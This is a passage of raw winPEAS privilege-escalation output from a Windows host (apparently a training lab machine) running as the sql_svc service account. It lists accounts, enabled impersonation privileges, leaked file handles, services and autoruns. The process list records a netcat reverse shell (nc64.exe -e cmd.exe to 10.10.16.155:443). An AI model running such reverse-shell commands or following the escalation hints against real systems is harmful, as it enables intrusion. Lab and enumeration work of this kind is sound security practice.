Low-priv ACLs : Everyone [AppendData|CreateDirectories|CreateFiles|Write|WriteAttributes|WriteData|WriteExtendedAttributes]
Observed owners: No privileged handles observed (service idle or access denied)
SDDL : O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
=================================================================================================
╔══════════╣ Enumerating AMSI registered providers (T1562.001)
Provider: {2781761E-28E0-4109-99FE-B9D127C57AFE}
Path:
=================================================================================================
╔══════════╣ Enumerating Sysmon configuration (T1518.001)
You must be an administrator to run this check
╔══════════╣ Enumerating Sysmon process creation logs (1) (T1654)
You must be an administrator to run this check
╔══════════╣ Installed .NET versions
(T1082)
CLR Versions
4.0.30319
.NET Versions
4.7.03190
.NET & AMSI (Anti-Malware Scan Interface) support
.NET version supports AMSI : False
OS supports AMSI : True
════════════════════════════════════╣ Interesting Events information (T1654,T1078,T1078.003,T1552.001,T1059.001,T1082) ╠════════════════════════════════════
╔══════════╣ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials
(T1078.003)
You must be an administrator to run this check
╔══════════╣ Printing Account Logon Events (4624) for the last 10 days.
(T1654,T1078)
You must be an administrator to run this check
╔══════════╣ Process creation events - searching logs (EID 4688) for sensitive data.
(T1654)
You must be an administrator to run this check
╔══════════╣ PowerShell events - script block logs (EID 4104) - searching for sensitive data.
(T1552.001,T1059.001)
╔══════════╣ Displaying Power off/on events for last 5 days
(T1082)
3/11/2026 7:43:30 PM : Startup
════════════════════════════════════╣ Users Information (T1087.001,T1087.004,T1033,T1134.001,T1115,T1563.002,T1083,T1552.002,T1201) ╠════════════════════════════════════
╔══════════╣ Users (T1087.001)
╚ Check if you have some admin equivalent privileges https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups
Current user: sql_svc
Current groups: Domain Users, Everyone, Users, Builtin\Performance Monitor Users, Service, Console Logon, Authenticated Users, This Organization, Local account, MSSQLSERVER, Local, NTLM Authentication
=================================================================================================
ARCHETYPE\Administrator: Built-in account for administering the computer/domain
|->Groups: Administrators
|->Password: CanChange-NotExpi-Req
ARCHETYPE\DefaultAccount(Disabled): A user account managed by the system.
|->Groups: System Managed Accounts Group
|->Password: CanChange-NotExpi-NotReq
ARCHETYPE\Guest: Built-in account for guest access to the computer/domain
|->Groups: Guests
|->Password: NotChange-NotExpi-NotReq
ARCHETYPE\sql_svc
|->Groups: Users
|->Password: CanChange-NotExpi-Req
ARCHETYPE\WDAGUtilityAccount(Disabled): A user account managed and used by the system for Windows Defender Application Guard scenarios.
|->Password: CanChange-Expi-Req
╔══════════╣ Current User Idle Time (T1033)
Current User : ARCHETYPE\sql_svc
Idle Time : 02h:42m:21s:390ms
╔══════════╣ Display Tenant information (DsRegCmd.exe /status) (T1087.004)
╔══════════╣ Current Token privileges (T1134.001)
╚ Check if you can escalate privilege using some enabled token https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
╔══════════╣ Clipboard text (T1115)
╔══════════╣ Logged users (T1033)
NT SERVICE\SQLTELEMETRY
ARCHETYPE\sql_svc
╔══════════╣ Display information about local users (T1087.001)
Computer Name : ARCHETYPE
User Name : Administrator
User Id : 500
Is Enabled : True
User Type : Administrator
Comment : Built-in account for administering the computer/domain
Last Logon : 10/14/2021 1:12:47 AM
Logons Count : 23
Password Last Set : 3/17/2020 2:37:03 AM
=================================================================================================
Computer Name : ARCHETYPE
User Name : DefaultAccount
User Id : 503
Is Enabled : False
User Type : Guest
Comment : A user account managed by the system.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM
=================================================================================================
Computer Name : ARCHETYPE
User Name : Guest
User Id : 501
Is Enabled : True
User Type : Guest
Comment : Built-in account for guest access to the computer/domain
Last Logon : 3/11/2026 8:55:09 PM
Logons Count : 0
Password Last Set : 1/20/2020 4:59:49 AM
=================================================================================================
Computer Name : ARCHETYPE
User Name : sql_svc
User Id : 1001
Is Enabled : True
User Type : User
Comment :
Last Logon : 3/11/2026 10:05:40 PM
Logons Count : 24
Password Last Set : 1/19/2020 4:05:12 PM
=================================================================================================
Computer Name : ARCHETYPE
User Name : WDAGUtilityAccount
User Id : 504
Is Enabled : False
User Type : Guest
Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM
=================================================================================================
╔══════════╣ RDP Sessions (T1563.002)
╚ Disconnected high-privilege RDP sessions keep reusable tokens inside LSASS. https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/credentials-mgmt/rdp-sessions
Not Found
╔══════════╣ Ever logged users (T1033)
NT SERVICE\SQLTELEMETRY
ARCHETYPE\Administrator
ARCHETYPE\sql_svc
╔══════════╣ Home folders found (T1083)
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Service [Allow: WriteData/CreateFiles]
C:\Users\sql_svc : sql_svc [Allow: AllAccess]
╔══════════╣ Looking for AutoLogon credentials (T1552.002)
Not Found
╔══════════╣ Password Policies (T1201)
╚ Check for a possible brute-force
Domain: Builtin
SID: S-1-5-32
MaxPasswordAge: 42.22:47:31.7437440
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: 0
=================================================================================================
Domain: ARCHETYPE
SID: S-1-5-21-1479773013-2644727484-962428355
MaxPasswordAge: 42.00:00:00
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: DOMAIN_PASSWORD_COMPLEX
=================================================================================================
╔══════════╣ Print Logon Sessions (T1033)
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 79843
Logon Time:
Logon Type: Service
Start Time: 3/11/2026 7:43:36 PM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/11/2026 7:43:36 PM
User Name: sql_svc
User Principal Name:
User SID:
=================================================================================================
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 4563397
Logon Time:
Logon Type: Network
Start Time: 3/11/2026 10:05:40 PM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/11/2026 10:05:40 PM
User Name: sql_svc
User Principal Name:
User SID:
=================================================================================================
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 4095006
Logon Time:
Logon Type: Network
Start Time: 3/11/2026 8:55:46 PM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/11/2026 8:55:46 PM
User Name: sql_svc
User Principal Name:
User SID:
=================================================================================================
════════════════════════════════════╣ Processes Information (T1057,T1134.001) ╠════════════════════════════════════
╔══════════╣ Interesting Processes -non Microsoft- (T1057)
╚ Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#running-processes
conhost(364)[C:\Windows\system32\conhost.exe] -- POwn: sql_svc
Command Line: \??\C:\Windows\system32\conhost.exe 0x4
=================================================================================================
powershell(1736)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] -- POwn: sql_svc
Command Line: powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.16.155 443
=================================================================================================
nc64(1972)[C:\Users\sql_svc\Downloads\nc64.exe] -- POwn: sql_svc
Permissions: sql_svc [Allow: AllAccess]
Possible DLL Hijacking folder: C:\Users\sql_svc\Downloads (sql_svc [Allow: AllAccess])
Command Line: "C:\Users\sql_svc\Downloads\nc64.exe" -e cmd.exe 10.10.16.155 443
=================================================================================================
powershell(1636)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] -- POwn: sql_svc
Command Line: powershell
=================================================================================================
sqlservr(1784)[C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe] -- POwn: sql_svc
Command Line: "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
=================================================================================================
winPEASx64(2332)[C:\Users\sql_svc\Downloads\winPEASx64.exe] -- POwn: sql_svc -- isDotNet
Permissions: sql_svc [Allow: AllAccess]
Possible DLL Hijacking folder: C:\Users\sql_svc\Downloads (sql_svc [Allow: AllAccess])
Command Line: "C:\Users\sql_svc\Downloads\winPEASx64.exe"
=================================================================================================
cmd(724)[C:\Windows\system32\cmd.exe] -- POwn: sql_svc
Command Line: "C:\Windows\system32\cmd.exe" /c "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.16.155 443"
=================================================================================================
cmd(2664)[C:\Windows\SYSTEM32\cmd.exe] -- POwn: sql_svc
Command Line: cmd.exe
=================================================================================================
╔══════════╣ Vulnerable Leaked Handlers (T1134.001)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#leaked-handlers
╚ Getting Leaked Handlers, it might take some time...
Handle: 2400(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\master.mdf
File Owner: BUILTIN\Administrators
=================================================================================================
Handle: 2612(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
File Owner: BUILTIN\Administrators
=================================================================================================
Handle: 2676(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
File Owner: BUILTIN\Administrators
=================================================================================================
Handle: 2708(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
File Owner: BUILTIN\Administrators
=================================================================================================
Handle: 2732(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\model.mdf
File Owner: BUILTIN\Administrators
=================================================================================================
Handle: 2740(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\modellog.ldf
File Owner: BUILTIN\Administrators
=================================================================================================
Handle: 2932(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\templog.ldf
File Owner: BUILTIN\Administrators
=================================================================================================
Handle: 2944(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
File Owner: BUILTIN\Administrators
=================================================================================================
Handle: 2956(file)
Handle Owner: Pid is 1784(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
=================================================================================================
════════════════════════════════════╣ Services Information (T1007,T1543.003,T1574.001,T1574.011,T1014,T1068) ╠════════════════════════════════════
╔══════════╣ Interesting Services -non Microsoft- (T1007)
╚ Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
ssh-agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Disabled - Stopped
Agent to hold private keys used for public key authentication.
=================================================================================================
VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running
Alias Manager and Ticket Service
=================================================================================================
vm3dservice(VMware, Inc. - VMware SVGA Helper Service)[C:\Windows\system32\vm3dservice.exe] - Auto - Running
Helps VMware SVGA driver by collecting and conveying user mode information
=================================================================================================
VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - Running
Provides support for synchronizing objects between the host and guest operating systems.
=================================================================================================
╔══════════╣ Modifiable Services (T1543.003)
╚ Check if you can modify any service https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
You cannot modify any service
╔══════════╣ Looking if you can modify any service registry (T1574.011)
╚ Check if you can modify the registry of a service https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services-registry-modify-permissions
[-] Looks like you cannot change the registry of any service...
╔══════════╣ Checking write permissions in PATH folders (DLL Hijacking) (T1574.001)
╚ Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\
C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\
C:\Program Files\Microsoft SQL Server\140\Tools\Binn\
C:\Program Files\Microsoft SQL Server\140\DTS\Binn\
╔══════════╣ OEM privileged utilities & risky components (T1068)
None of the supported OEM utilities were detected.
╔══════════╣ Kernel drivers with weak/legacy signatures (T1014)
╚ Legacy cross-signed drivers (pre-July-2015) can still grant kernel execution on modern Windows https://research.checkpoint.com/2025/cracking-valleyrat-from-builder-secrets-to-kernel-rootkits/
╚ Unable to enumerate kernel services
╔══════════╣ KernelQuick / ValleyRAT rootkit indicators (T1014)
╚ No KernelQuick-specific registry indicators were found
════════════════════════════════════╣ .NET SOAP Client Proxies (SOAPwn) (T1559,T1071.001) ╠════════════════════════════════════
╔══════════╣ Potential SOAPwn / HttpWebClientProtocol abuse surfaces (T1559,T1071.001)
╚ Look for .NET services that let attackers control SoapHttpClientProtocol URLs or WSDL imports to coerce NTLM or drop files. https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/
Error while enumerating services for SOAP client analysis: Invalid parameter
Not Found
════════════════════════════════════╣ Applications Information (T1518,T1547.001,T1053.005,T1010,T1014) ╠════════════════════════════════════
╔══════════╣ Current Active Window Application (T1010)
[X] Exception: Object reference not set to an instance of an object.
╔══════════╣ Installed Applications --Via Program Files/Uninstall registry-- (T1518)
╚ Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
C:\Program Files\common files
C:\Program Files\desktop.ini
C:\Program Files\internet explorer
C:\Program Files\Microsoft SQL Server
C:\Program Files\Microsoft Visual Studio 10.0
C:\Program Files\Microsoft.NET
C:\Program Files\Uninstall Information
C:\Program Files\VMware
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell
╔══════════╣ Autorun Applications (T1547.001)
╚ Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: VMware User Process
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected) - C:\
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Key: Userinit
Folder: C:\Windows\system32
File: C:\Windows\system32\userinit.exe,
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Key: Shell
Folder: None (PATH Injection)
File: explorer.exe
=================================================================================================
RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
Key: AlternateShell
Folder: None (PATH Injection)
File: cmd.exe
=================================================================================================
RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll
=================================================================================================
RegPath: HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _wow64cpu
Folder: None (PATH Injection)
File: wow64cpu.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _wowarmhw
Folder: None (PATH Injection)
File: wowarmhw.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _xtajit
Folder: None (PATH Injection)
File: xtajit.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: advapi32
Folder: None (PATH Injection)
File: advapi32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: clbcatq
Folder: None (PATH Injection)
File: clbcatq.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: combase
Folder: None (PATH Injection)
File: combase.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: COMDLG32
Folder: None (PATH Injection)
File: COMDLG32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: coml2
Folder: None (PATH Injection)
File: coml2.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: DifxApi
Folder: None (PATH Injection)
File: difxapi.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: gdi32
Folder: None (PATH Injection)
File: gdi32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: gdiplus
Folder: None (PATH Injection)
File: gdiplus.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: IMAGEHLP
Folder: None (PATH Injection)
File: IMAGEHLP.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: IMM32
Folder: None (PATH Injection)
File: IMM32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: kernel32
Folder: None (PATH Injection)
File: kernel32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: MSCTF
Folder: None (PATH Injection)
File: MSCTF.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: MSVCRT
Folder: None (PATH Injection)
File: MSVCRT.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: NORMALIZ
Folder: None (PATH Injection)
File: NORMALIZ.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: NSI
Folder: None (PATH Injection)
File: NSI.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: ole32
Folder: None (PATH Injection)
File: ole32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: OLEAUT32
Folder: None (PATH Injection)
File: OLEAUT32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: PSAPI
Folder: None (PATH Injection)
File: PSAPI.DLL
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: rpcrt4
Folder: None (PATH Injection)
File: rpcrt4.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: sechost
Folder: None (PATH Injection)
File: sechost.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: Setupapi
Folder: None (PATH Injection)
File: Setupapi.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHCORE
Folder: None (PATH Injection)
File: SHCORE.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHELL32
Folder: None (PATH Injection)
File: SHELL32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: SHLWAPI
Folder: None (PATH Injection)
File: SHLWAPI.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: user32
Folder: None (PATH Injection)
File: user32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: WLDAP32
Folder: None (PATH Injection)
File: WLDAP32.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: wow64
Folder: None (PATH Injection)
File: wow64.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: wow64win
Folder: None (PATH Injection)
File: wow64win.dll
=================================================================================================
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: WS2_32
Folder: None (PATH Injection)
File: WS2_32.dll
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}
Key: StubPath
Folder: None (PATH Injection)
File: U
=================================================================================================
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install
=================================================================================================
RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
=================================================================================================
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
=================================================================================================
Folder: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
FolderPerms: sql_svc [Allow: AllAccess]
File: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows,C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
FilePerms: sql_svc [Allow: AllAccess]
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
=================================================================================================
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [Allow: WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [Allow: WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows
File: C:\windows\system.ini
=================================================================================================
Folder: C:\windows
File: C:\windows\win.ini
=================================================================================================
Key: From WMIC
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr
=================================================================================================
╔══════════╣ Scheduled Applications --Non Microsoft-- (T1053.005)
╚ Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
╔══════════╣ Device Drivers --Non Microsoft-- (T1014)
╚ Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#drivers
QLogic Gigabit Ethernet - 7.12.31.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxvbda.sys
QLogic 10 GigE - 7.13.65.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\evbda.sys
NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvraid.sys
QLogic FastLinQ Ethernet - 8.33.20.103 [Cavium, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qevbda.sys
VMware vSockets Service - 9.8.17.0 build-16460229 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys
VMware PCI VMCI Bus Device - 9.8.16.0 build-14168184 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmci.sys
Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorV.sys
LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sss.sys
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadi.sys
QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadfcoei.sys
Emulex WS2K12 Storport Miniport Driver x64 - 11.0.247.8000 01/26/2016 WS2K12 64 bit x64 [Emulex]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxfcoe.sys
Emulex WS2K12 Storport Miniport Driver x64 - 11.4.225.8009 11/15/2017 WS2K12 64 bit x64 [Broadcom]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxstor.sys
QLogic iSCSI offload driver - 8.33.5.2 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qeois.sys
QLogic Fibre Channel Stor Miniport Driver - 9.1.15.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql2300i.sys
QLA40XX iSCSI Host Bus Adapter - 2.1.5.0 (STOREx wx64) [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql40xx2i.sys
QLogic FCoE Stor Miniport Inbox Driver - 9.1.11.3 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qlfcoei.sys
Chelsio Communications iSCSI Controller - 10.0.10011.16384 [Chelsio Communications]: \\.\GLOBALROOT\SystemRoot\System32\drivers\cht4sx64.sys
LSI 3ware RAID Controller - WindowsBlue [LSI]: \\.\GLOBALROOT\SystemRoot\System32\drivers\3ware.sys
AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsata.sys
Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdxata.sys
AMD Technology AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsbs.sys
Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\arcsas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ItSas35i.sys
LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas2i.sys
MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas.sys
Windows (R) Win 7 DDK driver - 10.0.10011.16384 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas3i.sys
MEGASAS RAID Controller Driver for Windows - 6.714.05.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\MegaSas2i.sys
MEGASAS RAID Controller Driver for Windows - 7.705.08.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas35i.sys
MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasr.sys
Marvell Flash Controller - 1.0.5.1016 [Marvell Semiconductor, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\mvumis.sys
